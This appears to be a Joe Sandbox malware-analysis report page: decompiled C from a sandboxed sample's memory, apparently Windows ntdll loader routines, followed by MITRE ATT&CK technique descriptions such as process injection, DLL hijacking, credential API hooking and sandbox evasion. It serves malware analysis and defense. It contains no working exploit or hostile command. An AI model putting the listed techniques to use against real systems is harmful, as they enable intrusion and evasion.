													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E328961C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push("true");
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E328D43A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L328A2330(_t288, _t377 + 0x2c);
														E32964407(_t377);
														E328A24D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E32897290;
											if(_t342 != E32897290) {
												__eflags = _t342 - E32895570;
												if(_t342 != E32895570) {
													 *0x329891e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E32895570( &_v216);
												goto L33;
											}
											E32897290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E32896970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E3288BE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E32896929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != E32896B70) {
											__eflags = _t384 - E328956E0;
											if(_t384 != E328956E0) {
												 *0x329891e0();
												 *_t384();
											} else {
												E328956E0(_t361);
											}
										} else {
											E32896B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E32897F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L328A2330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E328A24D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					L328D8F40( &_v216, 0, "true");
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					E32894A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E328D29A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}

0x328958e0
0x328958e0
0x328958e0
0x328958e5
0x328958e7
0x328958ec
0x328958f7
0x328958f8
0x328958fe
0x32895903
0x32895906
0x32895908
0x3289590b
0x3289590c
0x3289590d
0x3289590e
0x32895912
0x32895918
0x3289591b
0x3289591e
0x32895928
0x3289592e
0x32895935
0x3289593c
0x32895943
0x3289594a
0x32895951
0x32895958
0x3289595f
0x32895966
0x32895970
0x3289597a
0x32895985
0x3289598b
0x32895998
0x3289599d
0x328959a3
0x328959a8
0x328959b0
0x328959b2
0x328959b8
0x328959b8
0x328959c8
0x328959cd
0x328959d0
0x328959d7
0x328959e5
0x328959ea
0x328959f8
0x328f0745
0x328f074f
0x328f074f
0x328f0756
0x32895a25
0x32895a25
0x32895a2c
0x32895a31
0x32895a38
0x32895fef
0x32895fef
0x32895ff6
0x32895ffb
0x32896002
0x32896007
0x32896007
0x32896009
0x3289600f
0x32896017
0x3289601c
0x3289601c
0x32895b95
0x32895b99
0x32895f2d
0x32895f32
0x32895f36
0x32895f36
0x32895ba1
0x32895fcf
0x32895fcf
0x32895fd4
0x00000000
0x00000000
0x32895fd6
0x32895fd6
0x32895fd9
0x328f07dc
0x328f07e3
0x328f07e5
0x328f07ea
0x00000000
0x328f07ea
0x32895fdf
0x32895fe2
0x00000000
0x00000000
0x32895fe8
0x00000000
0x32895ba7
0x32895ba9
0x32895e71
0x32895e77
0x32895e79
0x32895bb4
0x32895bba
0x328f0836
0x328f083a
0x328f0841
0x328f0847
0x328f0847
0x32895bd4
0x32895bda
0x32895be0
0x32895be7
0x00000000
0x32895bed
0x32895bf3
0x32895ae0
0x32895ae0
0x32895aec
0x32895aef
0x32895af2
0x32895af5
0x32895af8
0x32895afb
0x32895b07
0x32895f69
0x32895f73
0x32895f8b
0x32895f90
0x32895f92
0x328f077f
0x328f077f
0x328f0789
0x32895b43
0x32895b43
0x32895b49
0x32895b53
0x32895b5a
0x32895b5d
0x32895b66
0x32895b67
0x32895b6d
0x32895b6e
0x32895b74
0x32895b7a
0x32895b7b
0x32895b80
0x32895b86
0x32895b8f
0x00000000
0x00000000
0x00000000
0x32895b8f
0x32895f98
0x32895f98
0x32895f9e
0x32895fa0
0x32895fa7
0x32895fae
0x32895fb1
0x00000000
0x32895fb1
0x32895b13
0x00000000
0x00000000
0x32895b19
0x32895b30
0x32895b35
0x32895b3b
0x32895b41
0x00000000
0x32895b41
0x32895bf9
0x32895bfe
0x32895e84
0x32895e8d
0x32895e93
0x32895ea1
0x32895ea9
0x32895eb4
0x32895eb9
0x32895ec0
0x32895ec6
0x32895ec7
0x32895ed0
0x32895ed1
0x32895ed2
0x32895ed8
0x32895f15
0x32895d52
0x32895d52
0x32895d59
0x32895d60
0x328f0909
0x328f0909
0x32895d6d
0x32895d74
0x32895d81
0x32895d86
0x32895d8d
0x32895d9e
0x328f0955
0x328f0958
0x328f095e
0x328f0960
0x328f0963
0x328f0969
0x328f0969
0x328f096f
0x328f096f
0x328f096f
0x328f096f
0x328f0971
0x328f0977
0x328f0979
0x328f0989
0x328f0992
0x328f0998
0x328f099c
0x328f099e
0x328f09a4
0x328f09a6
0x328f09ac
0x328f09ac
0x328f09b4
0x328f09b4
0x328f09bc
0x328f09c6
0x328f09ce
0x328f09cf
0x328f09d1
0x328f09d4
0x32895da4
0x32895da4
0x32895dac
0x32895f0b
0x32895f0b
0x32895db8
0x328f09e2
0x328f09e9
0x328f09ef
0x328f09ef
0x32895dbe
0x32895dc1
0x32895dc7
0x32895dc9
0x32895dcc
0x32895dd2
0x32895de0
0x32895de0
0x32895de2
0x32895de8
0x32895dea
0x32895df0
0x32895df3
0x32895e00
0x00000000
0x00000000
0x32895e08
0x32895eec
0x32895eef
0x328f09f9
0x328f0a00
0x00000000
0x00000000
0x328f0a06
0x32895ef7
0x32895f00
0x32895e29
0x32895e29
0x32895e2c
0x32895e34
0x32895e38
0x32895e3a
0x32895e40
0x32895e42
0x32895e4e
0x00000000
0x32895e58
0x32895e58
0x32895e5e
0x32895e66
0x00000000
0x00000000
0x00000000
0x32895e6c
0x32895e4e
0x32895e0e
0x32895e0e
0x32895e21
0x32895e23
0x00000000
0x32895e23
0x32895de0
0x00000000
0x32895d9e
0x32895eda
0x32895ee0
0x32895f53
0x32895f59
0x3289602d
0x32896033
0x32896035
0x00000000
0x32896035
0x32895f5f
0x00000000
0x32895f5f
0x32895ee2
0x00000000
0x32895ee2
0x32895c04
0x32895c0a
0x32895c0b
0x32895c11
0x32895c1a
0x00000000
0x00000000
0x32895c24
0x32896047
0x3289604c
0x3289604c
0x32895c2a
0x32895c30
0x32895c3a
0x32895c40
0x32895c4c
0x32895c52
0x32895c5f
0x32895c68
0x32895c71
0x32895c7a
0x32895c7d
0x32895c85
0x32895c9e
0x32895ca1
0x32895ca7
0x32895cad
0x32895cba
0x328f087c
0x32895cc0
0x32895cc0
0x32895cc0
0x32895cc4
0x328f0886
0x328f0889
0x328f0889
0x32895cd1
0x328f0897
0x328f0897
0x32895cf0
0x328f08a2
0x328f08a2
0x32895cf6
0x32895cfc
0x32895d09
0x328f08ae
0x328f08ae
0x32895d0f
0x32895d15
0x32895d22
0x328f08ba
0x328f08ba
0x32895d22
0x32895d28
0x32895d2f
0x32895d37
0x32895d39
0x32895d40
0x32895d47
0x32895f41
0x32895f47
0x32895fc2
0x32895fc8
0x32895f49
0x32895f49
0x32895f49
0x32895d4d
0x32895d4d
0x32895d4d
0x00000000
0x32895d47
0x32895be7
0x32895e7f
0x32895baf
0x00000000
0x32895baf
0x32895ba1
0x32895a46
0x32895a4b
0x32895a52
0x32895a5f
0x32895a64
0x32895a6b
0x32895a71
0x32895a76
0x328f0772
0x32896068
0x32896073
0x32896073
0x32895a7c
0x32895a82
0x32895a88
0x32895a8e
0x32895a92
0x32895a95
0x32895a9c
0x32895aa3
0x32895ab6
0x32895abb
0x32895abe
0x32895ac5
0x32895ace
0x32895ad1
0x32895ad3
0x00000000
0x32895ad3
0x328959fe
0x32895a01
0x32895a07
0x32895a08
0x32895a0d
0x32895a15
0x00000000
0x00000000
0x32895a1b
0x32895a1e
0x00000000

Strings

@, xrefs: 328F08AE

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ebcad1c5ca1ab20d2ed3dfaa31074aa5a5f1d7212120aa8e1e83993dab213ca9
Instruction ID: 90775cd558698f9f07767ff75f102794cf75f83b2e88b6bdb1b852b85637ed33
Opcode Fuzzy Hash: ebcad1c5ca1ab20d2ed3dfaa31074aa5a5f1d7212120aa8e1e83993dab213ca9
Instruction Fuzzy Hash: 7F325978D05369DFEB25CF68C884BDDBBB4BB08304F0041E9D459A7641DBB95A88CF90

Uniqueness

Uniqueness Score: -1.00%

Function 328C4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E328C4B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x3298b370 ^ _t114;
				_v8 =  *0x3298b370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E328D4B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							E328E8A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							E328E8A60(_t99, _t107);
							_t99 = _v96;
						}
						_t72 = _t111 + 0x18;
						if(_t99 < _t111 + 0x18) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x329865e4; // 0x75c3f0e0
															 *0x329891e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E328926A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x329837c0 & 0x00000003) != 0) {
																		E3290E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x329837c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x329837c0 & 0x00000005) != 0) {
																		_push(_t113);
																		E3290E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t110 + 0x24);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}

0x328c4b79
0x328c4b86
0x328c4b88
0x328c4b8e
0x328c4b90
0x328c4b93
0x328c4b97
0x328c4c27
0x328c4c35
0x328c4ba7
0x328c4ba7
0x328c4baa
0x328c4bac
0x328c4bb2
0x328c4bb2
0x328c4bb5
0x328c4bbc
0x3290330f
0x32903316
0x32903317
0x3290331e
0x32903321
0x32903324
0x32903327
0x3290332a
0x32903331
0x32903334
0x32903339
0x3290333e
0x3290333e
0x328c4bca
0x32903344
0x3290334b
0x3290334c
0x32903353
0x32903356
0x3290335d
0x32903360
0x32903363
0x3290336a
0x3290336d
0x32903372
0x32903372
0x328c4bd0
0x328c4bd5
0x328c4c36
0x328c4c36
0x00000000
0x328c4bd7
0x328c4bd7
0x328c4bd7
0x328c4bdf
0x00000000
0x328c4be1
0x328c4be3
0x328c4bec
0x328c4bef
0x328c4bf0
0x328c4bf9
0x328c4bfd
0x328c4bff
0x328c4c04
0x328c4c06
0x328c4c07
0x328c4c0a
0x328c4c0c
0x328c4c0f
0x328c4c1a
0x328c4c1c
0x328c4c21
0x3290337a
0x3290337a
0x3290337d
0x3290337d
0x32903384
0x00000000
0x32903386
0x32903386
0x3290338b
0x329033b2
0x329033b5
0x329033b9
0x329033be
0x329033f7
0x329033f7
0x328c4c76
0x328c4c84
0x328c4c8c
0x328c4c90
0x328c4ca9
0x328c4ca9
0x328c4cae
0x328c4ce4
0x328c4cee
0x328c4cf3
0x328c4cf3
0x328c4ce6
0x328c4ce6
0x328c4cb2
0x32903463
0x3290347b
0x32903480
0x3290348a
0x32903490
0x32903490
0x3290348a
0x328c4cbe
0x328c4c92
0x328c4c98
0x328c4cc5
0x00000000
0x32903423
0x32903429
0x00000000
0x3290342f
0x00000000
0x3290342f
0x32903429
0x00000000
0x328c4c9a
0x328c4c9a
0x328c4ca1
0x32903434
0x3290344f
0x32903454
0x32903454
0x328c4ca7
0x328c4ca7
0x00000000
0x328c4c98
0x32903391
0x32903398
0x3290339c
0x329033a2
0x00000000
0x329033a2
0x3290338b
0x00000000
0x329033a7
0x329033a7
0x329033a9
0x329033ad
0x328c4c21
0x328c4c1a
0x328c4c04
0x00000000
0x328c4bfd
0x328c4bdf
0x00000000
0x328c4bd5
0x00000000
0x328c4bac
0x00000000

Strings

Flst, xrefs: 328C4BB6
0, xrefs: 328C4BE3

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: e87a09dfcacf57dc81fca3d81eb9ae2378654c78e0fc9ffeb1fc9377205cc53a
Instruction ID: bb27bd4322f23565b5e61314289263272ba9cdc684baa39c2136a9e93a79261b
Opcode Fuzzy Hash: e87a09dfcacf57dc81fca3d81eb9ae2378654c78e0fc9ffeb1fc9377205cc53a
Instruction Fuzzy Hash: 93517CB9E012588FEB24CF95C88475DFBF4EF44754F54C42AD44A9B250EBB0D985CB90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
